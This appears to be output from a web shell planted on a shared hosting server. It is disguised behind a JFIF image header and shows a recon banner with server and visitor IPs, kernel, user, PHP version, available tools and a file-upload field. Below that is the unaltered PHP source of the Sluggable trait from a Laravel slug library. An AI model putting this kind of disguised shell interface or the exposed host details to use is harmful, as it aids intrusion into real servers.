����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.128.153.112 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./cbt.gltechlimited.com/vendor/cviebrock/eloquent-sluggable/src/ |
Upload File : |
<?php namespace Cviebrock\EloquentSluggable; use Cocur\Slugify\Slugify; use Cviebrock\EloquentSluggable\Services\SlugService; use Illuminate\Database\Eloquent\Builder; use Illuminate\Database\Eloquent\Model; /** * Class Sluggable * * @package Cviebrock\EloquentSluggable */ trait Sluggable { /** * Hook into the Eloquent model events to create or * update the slug as required. */ public static function bootSluggable(): void { static::observe(app(SluggableObserver::class)); } /** * Register a slugging model event with the dispatcher. * * @param \Closure|string $callback */ public static function slugging($callback): void { static::registerModelEvent('slugging', $callback); } /** * Register a slugged model event with the dispatcher. * * @param \Closure|string $callback */ public static function slugged($callback): void { static::registerModelEvent('slugged', $callback); } /** * @inheritDoc */ public function replicate(array $except = null) { $instance = parent::replicate($except); (new SlugService())->slug($instance, true); return $instance; } /** * Return the event name that should be listened to for generating slugs. * * Can be one of: * - SluggableObserver::SAVING (to generate the slug before the model is saved) * - SluggableObserver::SAVED (to generate the slug after the model is saved) * * The second option is required if the primary key is to be part of the slug * source, as it won't be set during the "saving" event. * * @return string */ public function sluggableEvent(): string { return SluggableObserver::SAVING; } /** * Query scope for finding "similar" slugs, used to determine uniqueness. * * @param \Illuminate\Database\Eloquent\Builder $query * @param string $attribute * @param array $config * @param string $slug * @return \Illuminate\Database\Eloquent\Builder */ public function scopeFindSimilarSlugs(Builder $query, string $attribute, array $config, string $slug): Builder { $separator = $config['separator']; return $query->where(function(Builder $q) use ($attribute, $slug, $separator) { $q->where($attribute, '=', $slug) ->orWhere($attribute, 'LIKE', $slug . $separator . '%'); }); } /** * Return the sluggable configuration array for this model. * * @return array */ abstract public function sluggable(): array; /** * Optionally customize the cocur/slugify engine. * * @param \Cocur\Slugify\Slugify $engine * @param string $attribute * @return \Cocur\Slugify\Slugify */ public function customizeSlugEngine(Slugify $engine, string $attribute): Slugify { return $engine; } /** * Optionally add constraints to the query that determines uniqueness. * * @param \Illuminate\Database\Eloquent\Builder $query * @param \Illuminate\Database\Eloquent\Model $model * @param string $attribute * @param array $config * @param string $slug * @return \Illuminate\Database\Eloquent\Builder */ public function scopeWithUniqueSlugConstraints( Builder $query, Model $model, string $attribute, array $config, string $slug ): Builder { return $query; } }